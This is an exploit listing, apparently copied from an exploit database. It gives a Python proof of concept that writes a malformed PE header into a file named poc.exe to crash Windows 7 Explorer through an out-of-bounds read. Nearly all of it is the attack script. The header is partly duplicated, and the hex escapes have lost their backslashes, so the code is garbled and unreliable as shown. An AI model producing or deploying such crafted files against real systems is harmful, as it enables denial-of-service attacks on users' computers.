Microsoft Windows Explorer Out-Of-Bounds Read Denial Of Service

Details
Category: Vulnerabilities
Hits: 279
# Exploit Title: Microsoft Windows Explorer Out-of-Bound read - Denial of Service (PoC)
# Date: 2018-09-01
# Exploit Author: Ghaaf
# Vendor Homepage: http://www.microsoft.com
# Ver # Exploit Title: Microsoft Windows Explorer Out-of-Bound read - Denial of Service (PoC)
# Date: 2018-09-01
# Exploit Author: Ghaaf
# Vendor Homepage: http://www.microsoft.com
# Version: Windows 7(x86/x64)
# Tested on: 6.1.7601 Service Pack 1 Build 7601
# CVE: N/A

buffer = ''
buffer += "x4Dx5Ax90x00x03x00x00x00x04x00x00x00xFFxFFx00x00"
buffer += "xB8x00x00x00x00x00x00x00x40x00x00x00x00x00x00x00"
buffer += "x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00"
buffer += "x00x00x00x00x00x00x00x00x00x00x00x00xB8x00x00x00"
buffer += "x0Ex1FxBAx0Ex00xB4x09xCDx21xB8x01x4CxCDx21x54x68"
buffer += "x69x73x20x70x72x6Fx67x72x61x6Dx20x63x61x6Ex6Ex6F"
buffer += "x74x20x62x65x20x72x75x6Ex20x69x6Ex20x44x4Fx53x20"
buffer += "x6Dx6Fx64x65x2Ex0Dx0Dx0Ax24x00x00x00x00x00x00x00"
buffer += "x8Fx8AxF9xDBxCBxEBx97x88xCBxEBx97x88xCBxEBx97x88"
buffer += "x48xF7x99x88xCAxEBx97x88xA2xF4x9Ex88xCAxEBx97x88"
buffer += "x22xF4x9Ax88xCAxEBx97x88x52x69x63x68xCBxEBx97x88"
buffer += "x00x00x00x00x00x00x00x00x50x45x00x00x4Cx01x03x00"
buffer += "xE8x2Dx73x54x00x00x00x00x00x00x00x00x20x20x0Fx01"
buffer += "x0Bx01x06x00x00x10x00x00x00x20x00x00x00x00x00x00"
buffer += "x68x11x00x00x00x10x00x00x00x20x00x00x00x00x40x00"
buffer += "x00x10x00x00x00x10x00x00x04x00x00x00x01x00x00x00"
buffer += "x04x00x00x00x00x00x00x00x00x40x00x00x00x10x00x00"
buffer += "xB2xEAx00x00x02x00x00x00x00x00x10x00x00x10x00x00"
buffer += "x00x00x10x00x00x10x00x00x00x00x00x00x10x00x00x00"
buffer += "x00x00x00x00x00x00x00x00x94x1Ax00x00x28x00x00x00"
buffer += "x00x30x00x00xA4x08x00x00x00x00x00x00x00x00x00x00"
buffer += "x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00"
buffer += "x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00"
buffer += "x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00"
buffer += "x00x00x00x00x00x00x00x00x28x02x00x00x20x00x00x00"
buffer += "x00x10x00x00x88x00x00x00x00x00x00x00x00x00x00x00"
buffer += "x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00"
buffer += "x2Ex74x65x78x74x00x00x00x38x0Dx00x00x00x10x00x00"
buffer += "x00x10x00x00x00x10x00x00x00x00x00x00x00x00x00x00"
buffer += "x00x00x00x00x20x00x00x60x2Ex64x61x74x61x00x00x00"
buffer += "xE0x09x00x00x00x20x00x00x00x10x00x00x00x20x00x00"
buffer += "x00x00x00x00x00x00x00x00x00x00x00x00x40x00x00xC0"
buffer += "x2Ex72x73x72x63x00x00x00xA4x08x00x00x00x30x00x00"
buffer += "x00x10x00x00x00x30x00x00x00x00x00x00x00x00x00x00"
buffer += "x00x00x00x00x40x00x00x40x6CxDAx5Bx4Ax10x00x00x00"
open("poc.exe", "wb").write(buffer)